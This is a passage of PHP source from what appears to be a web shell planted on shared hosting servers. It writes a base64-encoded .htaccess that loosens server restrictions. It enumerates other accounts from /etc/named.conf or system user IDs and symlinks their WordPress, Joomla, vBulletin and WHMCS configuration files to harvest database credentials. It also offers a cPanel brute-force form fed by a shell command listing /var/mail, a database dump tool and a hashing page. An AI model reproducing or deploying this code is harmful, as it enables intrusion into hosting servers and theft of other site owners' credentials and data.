'T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ==';
$file = fopen(".htaccess","w+");
$write = fwrite ($file ,base64_decode($htaccess));
echo "<hr><center><b>DONE!";
echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
exit;
}
if($_POST['mendapatkan']=='passwd'){
@set_magic_quotes_runtime(0);
ob_start();
error_reporting(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$fn = $_POST['foldername'];
//all function here
function syml($usern,$pdomain)
{
symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
}
$d0mains = @file("/etc/named.conf");
if($d0mains)
{
mkdir($fn);
chdir($fn);
foreach($d0mains as $d0main)
{
if(eregi("zone",$d0main))
{
preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();
if(strlen(trim($domains[1][0])) > 2)
{
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
syml($user['name'],$domains[1][0]);
}
}
}
echo "<center><font color=lime size=3>[ Done ]</font></center>";
echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
}
else
{
mkdir($fn);
chdir($fn);
$temp = "";
$val1 = 0;
$val2 = 1000;
for(;$val1 <= $val2;$val1++)
{
$uid = @posix_getpwuid($val1);
if ($uid)
$temp .= join(':',$uid)."\n";
}
echo '<br/>';
$temp = trim($temp);
$file5 = fopen("test.txt","w");
fputs($file5,$temp);
fclose($file5);
$htaccess =
'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh
aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp
biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=
';
$file = fopen(".htaccess","w+");
$write = fwrite ($file ,base64_decode($htaccess));
$file = fopen("test.txt", "r") or exit("Unable to open file!");
while(!feof($file))
{
$s = fgets($file);
$matches = array();
$t = preg_match('/\/(.*?)\:\//s', $s, $matches);
$matches = str_replace("home/","",$matches[1]);
if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
continue;
syml($matches,$matches);
}
fclose($file);
echo "</table>";
unlink("test.txt");
echo "<center><font color=lime size=3>[ Done ]</font></center>";
echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
}
echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
exit;
}
?>
<form method="POST" target="_blank">
<strong>
<input name="page" type="hidden" value="find"><table>
</strong><br><br><center><font size="5" style="italic" color="#00ff00">=[ Cpanel BruteForce ]=</font></center><br><br>
<table width="600" border="0" cellpadding="3" cellspacing="1" align="center">
<tr>
<td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
<center><b><font size="5" style="italic" color="#00ff00">Cpanel BruteForce</font></b></center></td></tr>
<tr>
<td>
<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
<td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
<strong>User :</strong></td>
<td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="usernames"><?php system('ls /var/mail');?></textarea></strong></td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
<strong>Pass :</strong></td>
<td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="passwords"></textarea></strong></td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
<strong>Type :</strong></td>
<td valign="top" bgcolor="#151515" colspan="5">
<span class="style2"><strong>Simple : </strong> </span>
<strong>
<input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
<font class="style2"><strong>/etc/passwd : </strong> </font>
<strong>
<input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>
</strong>
</span>
</td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px"></td>
<td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="start">
</strong>
</td>
<tr>
</form>
<tr>
<td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Get Config :</strong></td>
</tr>
<form method="POST" target="_blank">
<strong>
<input name="mendapatkan" type="hidden" value="passwd">
</strong>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px"><strong>Folder Name :</strong></td>
<td valign="top" bgcolor="#151515"><strong><input class ='inputz' size="35" name="foldername" type="text"></strong></td>
</strong>
</td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px"></td>
<td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">
</strong>
</td>
<tr>
</form>
<tr>
<td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Get Wordlist</strong></td>
</tr>
<form method="POST" target="_blank">
<strong>
<input name="pass" type="hidden" value="password">
</strong>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px"><strong>Url Config :</strong></td>
<td valign="top" bgcolor="#151515"><strong><input class ='inputz' size="35" name="url" type="text"></strong></td>
</strong>
</td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px"></td>
<td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">
</strong>
</td>
<tr>
</form>
<tr>
<td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Info
Security</strong></td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td>
<td valign="top" bgcolor="#151515" colspan="5">
<strong>
<?php
$safe_mode = ini_get('safe_mode');
if($safe_mode=='1')
{
echo 'ON';
}else{
echo 'OFF';
}
?>
</strong>
</td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px"><strong>Desible Function</strong></td>
<td valign="top" bgcolor="#151515" colspan="5">
<strong>
<form method="POST" target="_blank">
<strong>
<input name="matikan" type="hidden" value="sekatan">
</strong>
<?php
if(''==($func=@ini_get('disable_functions')))
{
echo "<font color=#00ff00>No Security for Function</font></b>";
}else{
echo '<script>alert("Please see below and press >Please Click Here First!<");</script>';
echo "<font color=red>$func</font></b>";
echo '<tr><td valign="top" bgcolor="#151515" style="width: 139px"></td>';
echo '<td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="Please Click Here First!">
</strong>
</td></tr>';
check_com($h3h3);
}
echo"</table>";
}
/////////////////////////////////////////////////////////////////
elseif(isset($_GET['x']) && ($_GET['x'] == 'dump'))
{
?>
<form action="?y=<?php echo $pwd; ?>&x=dump" method="post">
<?php
echo $head.'<p align="center">';
echo '
<table width=371 class=tabnet >
<tr><th colspan="2">Database Dump</th></tr>
<tr>
<td>Server </td>
<td><input class="inputz" type=text name=server size=52></td></tr><tr>
<td>Username</td>
<td><input class="inputz" type=text name=username size=52></td></tr><tr>
<td>Password</td>
<td><input class="inputz" type=text name=password size=52></td></tr><tr>
<td>DataBase Name</td>
<td><input class="inputz" type=text name=dbname size=52></td></tr>
<tr>
<td>DB Type </td>
<td><form method=post action="'.$me.'">
<select class="inputz" name=method>
<option value="gzip">Gzip</option>
<option value="sql">Sql</option>
</select>
<input class="inputzbut" type=submit value=" Dump! " ></td></tr>
</form></center></table>';
if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
$date = date("Y-m-d");
$dbserver = $_POST['server'];
$dbuser = $_POST['username'];
$dbpass = $_POST['password'];
$dbname = $_POST['dbname'];
$file = "Dump-$dbname-$date";
$method = $_POST['method'];
if ($method=='sql'){
$file="Dump-$dbname-$date.sql";
$fp=fopen($file,"w");
}else{
$file="Dump-$dbname-$date.sql.gz";
$fp = gzopen($file,"w");
}
function write($data) {
global $fp;
if ($_POST['method']=='ssql'){
fwrite($fp,$data);
}else{
gzwrite($fp, $data);
}}
mysql_connect ($dbserver, $dbuser, $dbpass);
mysql_select_db($dbname);
$tables = mysql_query ("SHOW TABLES");
while ($i = mysql_fetch_array($tables)) {
$i = $i['Tables_in_'.$dbname];
$create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
write($create['Create Table'].";\n\n");
$sql = mysql_query ("SELECT * FROM ".$i);
if (mysql_num_rows($sql)) {
while ($row = mysql_fetch_row($sql)) {
foreach ($row as $j => $k) {
$row[$j] = "'".mysql_escape_string($k)."'";
}
write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
}
}
}
if ($method=='ssql'){
fclose ($fp);
}else{
gzclose($fp);}
header("Content-Disposition: attachment; filename=" . $file);
header("Content-Type: application/download");
header("Content-Length: " . filesize($file));
flush();
$fp = fopen($file, "r");
while (!feof($fp))
{
echo fread($fp, 65536);
flush();
}
fclose($fp);
}
}
/////////////////////////////////////////////////////////////////
elseif(isset($_GET['x']) && ($_GET['x'] == 'hash'))
{
$submit= $_POST['enter'];
if (isset($submit)) {
$pass = $_POST['password']; // password
$salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
$hash = md5($pass); // md5 hash #1
$md4 = hash("md4",$pass);
$hash_md5 = md5($salt.$pass); // md5 hash with salt #2
$hash_md5_double = md5(sha1($salt.$pass)); // md5 hash with salt & sha1 #3
$hash1 = sha1($pass); // sha1 hash #4
$sha256 = hash("sha256",$text);
$hash1_sha1 = sha1($salt.$pass); // sha1 hash with salt #5
$hash1_sha1_double = sha1(md5($salt.$pass)); // sha1 hash with salt & md5 #6
}
echo '<form action="" method="post"><b><table class=tabnet>';
echo '<tr><th colspan="2">Password Hash</th></center></tr>';
echo '<tr><td><b>masukan kata yang ingin di encrypt:</b></td>';
echo '<td><input class="inputz" type="text" name="password" size="40" />';
echo '<input class="inputzbut" type="submit" name="enter" value="hash" />';
echo '</td></tr><br>';
echo '<tr><th colspan="2">Hasil Hash</th></center></tr>';
echo '<tr><td>Original Password</td><td><input class=inputz type=text size=50 value='.$pass.'></td></tr><br><br>';
echo '<tr><td>MD5</td><td><input class=inputz type=text size=50 value='.$hash.'></td></tr><br><br>';
echo '<tr><td>MD4</td><td><input class=inputz type=text size=50 value='.$md4.'></td></tr><br><br>';
